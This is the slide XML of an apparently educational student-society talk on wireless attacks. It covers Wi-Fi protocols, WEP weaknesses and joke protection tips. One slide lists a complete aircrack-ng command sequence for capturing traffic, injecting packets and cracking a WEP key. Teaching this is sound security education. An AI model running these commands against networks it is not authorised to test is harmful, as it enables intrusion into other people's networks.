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0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ntu_network-wireless-connected-100.sv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3007" y="1996715"/>
            <a:ext cx="1898786" cy="1898785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Wireless Attacks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by Victor Azzam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Silicon-Valley-Season-1-Episode-4-2-9d7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0952" y="1840376"/>
            <a:ext cx="10822896" cy="6072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1270000" y="1333500"/>
            <a:ext cx="10464800" cy="64770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rPr>
              <a:t>Disclaimer</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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6000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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rPr>
              <a:t>The Hacker Society at ITB </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" sz="3400" u="sng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rPr>
              <a:t>does not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="34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rPr>
              <a:t> encourage, or take responsibility for, anyone who uses the information learned from this presentation unethically.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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rPr>
              <a:t>Furthermore, anyone found to engage in hacking unauthorised property will face severe consequences, including being banned from the society.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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Topics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906347" y="3171725"/>
            <a:ext cx="11099801" cy="580431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906347" y="4586585"/>
            <a:ext cx="11099801" cy="580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457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75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42" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906347" y="3879155"/>
            <a:ext cx="11099801" cy="580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457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75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Attacking WEP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906347" y="5294014"/>
            <a:ext cx="11099801" cy="580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457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75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Protecting against attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906347" y="6001444"/>
            <a:ext cx="11099801" cy="580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457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75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Obscurity is not security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="kis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4197" y="3485943"/>
            <a:ext cx="5872506" cy="2781714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="DC3142"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="e18apltimgsz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23333" y="601615"/>
            <a:ext cx="6558134" cy="8550370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presetClass="entr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" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="41" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="44" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="46" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="43" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="42" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="45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952500" y="279400"/>
            <a:ext cx="11099800" cy="971352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocols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696962" y="1545406"/>
            <a:ext cx="11610877" cy="7879925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WEP — Wired Equivalent Privacy</a:t>
            </a:r>
            <a:endParaRPr sz="2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Authentication is either Open System or Shared Key</a:t>
            </a:r>
            <a:endParaRPr sz="2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Encryption relies on users sharing a key</a:t>
            </a:r>
            <a:endParaRPr sz="2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WPA — Wi-Fi Protected Access</a:t>
            </a:r>
            <a:endParaRPr sz="2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Intended as a transition for old hardware to replace WEP</a:t>
            </a:r>
            <a:endParaRPr sz="2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Uses TKIP which improves on WEP but has the same mechanism</a:t>
            </a:r>
            <a:endParaRPr sz="2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WPA2</a:t>
            </a:r>
            <a:endParaRPr sz="2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Same as WPA but TKIP encryption is replaced with CCMP</a:t>
            </a:r>
            <a:endParaRPr sz="2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WPS — Wi-Fi Protected Setup</a:t>
            </a:r>
            <a:endParaRPr sz="2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Designed as an extension to WPA and WPA2 to allow devices with only a numeric keypad (usually IoT) to connect securely</a:t>
            </a:r>
            <a:endParaRPr sz="2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Problem: the password is an 8-digit PIN anyone can bruteforce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7" dur="5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1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20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25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30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35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40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45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50" dur="5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60" dur="500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952500" y="406400"/>
            <a:ext cx="11099800" cy="971352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking WEP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696962" y="1697806"/>
            <a:ext cx="11610877" cy="7257357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Default encryption introduced in the first IEEE 802.11 standard (1999)</a:t>
            </a:r>
            <a:endParaRPr sz="2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Based on the RC4 algorithm, uses a key and a unique IV (Initialisation Vector) to encrypt the message and its ICV (Integrity Check Value)</a:t>
            </a:r>
            <a:endParaRPr sz="2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Two main types:</a:t>
            </a:r>
            <a:endParaRPr sz="2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2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64-bit — 40-bit key (10x 4-bit hex chars) + 24-bit IV (standard)</a:t>
            </a:r>
            <a:endParaRPr sz="2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2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128-bit — 104-bit key (26x 4-bit hex chars) + 24-bit IV</a:t>
            </a:r>
            <a:endParaRPr sz="2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8F71F4"/>
                </a:solidFill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= (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="280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M</a:t>
            </a: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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="280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ICV</a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="280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M</a:t>
            </a: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)) </a:t>
            </a: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xor</a:t>
            </a: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80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RC4</a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="EEB83F"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>K</a:t>
            </a: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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="75DB3C"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>IV</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr sz="2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Attack by obtaining 1500 bytes to help</a:t>
            </a:r>
            <a:b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</a:b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forge and inject new packets</a:t>
            </a:r>
            <a:endParaRPr sz="2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Send the packet back to the AP it will</a:t>
            </a:r>
            <a:b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</a:b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send you a new packet with a new IV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="wep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3950" y="6009742"/>
            <a:ext cx="4727526" cy="2712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hack-filtered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3759" y="2077506"/>
            <a:ext cx="10777282" cy="5598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nodeType="afterEffect" presetClass="exit" presetSubtype="2" presetID="15" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="5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10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1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3" dur="10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8" dur="10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10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8" dur="10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10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3" dur="10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" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="54" grpId="2"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="52" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="53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952500" y="406400"/>
            <a:ext cx="11099800" cy="971352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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57" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742999" y="1816100"/>
            <a:ext cx="11518802" cy="5702300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2" indent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# Set your Wi-Fi card to monitor mode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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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ifconfig wlan0 down</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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iwconfig wlan0 mode monitor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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ifconfig wlan0 up</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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# Look for available APs (Access Points), copy target BSSID and channel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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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airodump-ng wlan0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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# Scan the target AP by adding its BSSID and channel, save the output to a file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# Keep this window running, open a new one to continue (Ctrl + Shift + N)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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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airodump-ng —-bssid </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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BSSID</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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 -c </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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channel</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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 -w captured wlan0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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# Fake-authenticate with the AP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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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aireplay-ng -1 0 -a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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BSSID</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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 wlan0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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# Inject new packets into the network, forcing the AP to generate new IVs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# Wait until #DATA in the first window has reached about 10K-15K before continuing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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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aireplay-ng -3 -b </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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BSSID</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="00F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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 wlan0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00F900">
                  <a:alpha val="80000"/>
                </a:srgbClr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endParaRPr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# Hack the mainframe</a:t>
            </a:r>
            <a:endParaRPr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  <a:latin typeface="Menlo Regular"/>
              <a:ea typeface="Menlo Regular"/>
              <a:cs typeface="Menlo Regular"/>
              <a:sym typeface="Menlo Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent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F900">
                    <a:alpha val="80000"/>
                  </a:srgbClr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rPr>
              <a:t>aircrack-ng captured-01.cap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="2159000"/>
            <a:ext cx="4285655" cy="785069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787400" y="3484016"/>
            <a:ext cx="4285655" cy="25970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787400" y="4550816"/>
            <a:ext cx="7532917" cy="25970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787400" y="5363616"/>
            <a:ext cx="4285655" cy="25970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787400" y="6429970"/>
            <a:ext cx="4285655" cy="25970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787400" y="6890990"/>
            <a:ext cx="4285655" cy="61148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pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="robot_deb3g_mediagallery_tyrellfigh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3943" y="2293712"/>
            <a:ext cx="11376914" cy="6399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58aeacc80ad9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893" y="2290070"/>
            <a:ext cx="11373014" cy="6406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xi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xit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nodeType="after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nodeType="after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nodeType="afterEffect" presetClass="entr" presetSubtype="0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nodeType="afterEffect" presetClass="entr" presetSubtype="0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nodeType="afterEffect" presetClass="entr" presetSubtype="0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nodeType="afterEffect" presetClass="entr" presetSubtype="0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nodeType="afterEffect" presetClass="entr" presetSubtype="0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6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presetClass="exit" presetSubtype="0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presetClass="exit" presetSubtype="0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presetClass="exit" presetSubtype="0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presetClass="exit" presetSubtype="0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presetClass="exit" presetSubtype="0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presetClass="exit" presetSubtype="0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" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="59" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="65" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="65" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="61" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="60" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="63" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="62" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="57" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="59" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="58" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="63" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="62" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="64" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="60" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="61" grpId="7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952500" y="279400"/>
            <a:ext cx="11099800" cy="971352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr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FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection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696962" y="1545406"/>
            <a:ext cx="11610877" cy="7879925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Constantly change the key, such a burden though</a:t>
            </a:r>
            <a:endParaRPr sz="2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Remove security altogether</a:t>
            </a:r>
            <a:endParaRPr sz="2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Replace WEP with a more</a:t>
            </a:r>
            <a:b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</a:b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robust algorithm like WPA</a:t>
            </a:r>
            <a:endParaRPr sz="2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Stop using Wi-Fi</a:t>
            </a:r>
            <a:endParaRPr sz="2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spcBef>
                <a:spcPts val="30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Connect directly to the mainframe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="dfs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0463" y="2281529"/>
            <a:ext cx="4993348" cy="2832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2ea2ecfd7d8ad0298f455f78b12cd28e_XL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7985" y="6071547"/>
            <a:ext cx="2416214" cy="2188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Cash-getty-John-Kuczala-171682699-56a1c2443df78cf7726db03c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47657" y="6144471"/>
            <a:ext cx="1948610" cy="2188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tmp8094640839453573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12320" y="6752803"/>
            <a:ext cx="1123558" cy="971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lus-512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60252" y="6752803"/>
            <a:ext cx="971352" cy="971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Ef6ur87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51932" y="6144471"/>
            <a:ext cx="2917354" cy="2188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nodeType="after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nodeType="after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nodeType="after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nodeType="afterEffect" presetClass="entr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" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="69" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="74" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="72" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="70" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="73" grpId="7"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="6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270000" y="889000"/>
            <a:ext cx="10464800" cy="14224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Obscurity?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270000" y="7140501"/>
            <a:ext cx="10464800" cy="57799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Would you store your house keys under the doormat?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="obscurit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1344" y="2784401"/>
            <a:ext cx="11002112" cy="3883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" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="77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452627" indent="-452627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2772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https://security.stackexchange.com/questions/41230</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627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2772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https://en.wikipedia.org/wiki/IEEE_802.11</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627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2772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https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627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2772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https://en.wikipedia.org/wiki/Temporal_Key_Integrity_Protocol</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627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2772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https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627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2772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https://www.youtube.com/watch?v=qbb5daMAeM0</a:t>
            </a:r>
            <a:endParaRPr sz="2772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452627" indent="-452627" defTabSz="578358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2772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Google… obviously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nodeType="afterEffect" presetClass="entr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Class="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="entr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nodeType="afterEffect" presetClass="exit" presetSubtype="2" presetID="2" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="200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nodeType="afterEffect" presetClass="exit" presetSubtype="2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nodeType="afterEffect" presetClass="exit" presetSubtype="2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nodeType="afterEffect" presetClass="exit" presetSubtype="2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nodeType="afterEffect" presetClass="exit" presetSubtype="2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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="74" nodeType="afterEffect" presetClass="exit" presetSubtype="2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nodeType="afterEffect" presetClass="exit" presetSubtype="2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84" nodeType="afterEffect" presetClass="exit" presetSubtype="2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Class="exit" presetSubtype="2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" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="80" grpId="3"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="81" grpId="2"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="81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